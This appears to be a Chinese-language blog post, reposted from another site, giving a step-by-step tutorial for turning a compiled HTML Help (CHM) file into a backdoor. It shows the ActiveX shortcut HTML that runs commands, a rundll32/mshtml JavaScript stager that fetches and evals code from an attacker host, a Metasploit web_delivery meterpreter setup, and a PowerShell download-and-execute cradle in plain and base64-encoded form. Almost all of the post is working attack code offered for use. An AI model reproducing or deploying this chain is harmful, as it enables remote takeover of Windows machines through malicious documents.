chm+JSBackdoor

转载于https://evi1cg.me/archives/chm_backdoor.html
原理:chm启动计算器

 

代码如下

  1. <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
  2. command exec
  3. <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  4. <PARAM name="Command" value="ShortCut">
  5. <PARAM name="Button" value="Bitmap::shortcut">
  6. <PARAM name="Item1" value=',calc.exe'>
  7. <PARAM name="Item2" value="273,1,1">
  8. </OBJECT>
  9. <SCRIPT>
  10. x.Click();
  11. </SCRIPT>
  12. </body></html>

使用JSBackdoor

python MyJSRat.py -i 192.168.1.101 -p 8080

 

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

将其写入html中 代码如下
  1. <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
  2. This is a demo ! <br>
  3. <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  4. <PARAM name="Command" value="ShortCut">
  5. <PARAM name="Button" value="Bitmap::shortcut">
  6. <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
  7. <PARAM name="Item2" value="273,1,1">
  8. </OBJECT>
  9. <SCRIPT>
  10. x.Click();
  11. </SCRIPT>
  12. </body></html>
编译以后运行,可以成功获取JS交互shell
此时拿到shell 我们使用meterpreter进行会话
  1. ~ msfconsole -Lq
  2. msf > use exploit/multi/script/web_delivery
  3. msf exploit(web_delivery) > set target 2
  4. target => 2
  5. msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
  6. payload => windows/meterpreter/reverse_tcp
  7. msf exploit(web_delivery) > set lhost 192.168.1.101
  8. lhost => 192.168.1.101
  9. msf exploit(web_delivery) > set lport 6666
  10. lport => 6666
  11. msf exploit(web_delivery) > set SRVPORT 8081
  12. SRVPORT => 8081
  13. msf exploit(web_delivery) > set uripath /
  14. uripath => /
  15. msf exploit(web_delivery) > exploit
  16. [*] Exploit running as background job.
  17. msf exploit(web_delivery)
装有powershell的客户端执行以下命令则可获取meterpreter会话

powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');

由于存在特殊字符,我们可以把以上代码编码为base64格式,将以下代码存入power.txt

  1. $n=new-object net.webclient;
  2. $n.proxy=[Net.WebRequest]::GetSystemWebProxy();
  3. $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
  4. IEX $n.downloadstring('http://192.168.1.101:8081/');

执行以下命令:

cat power.txt | iconv --to-code UTF-16LE |base64

 

最终要执行的powershell命令为

powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==

使用执行命令模式直接获取meterpreter会话

python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="

 

 

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注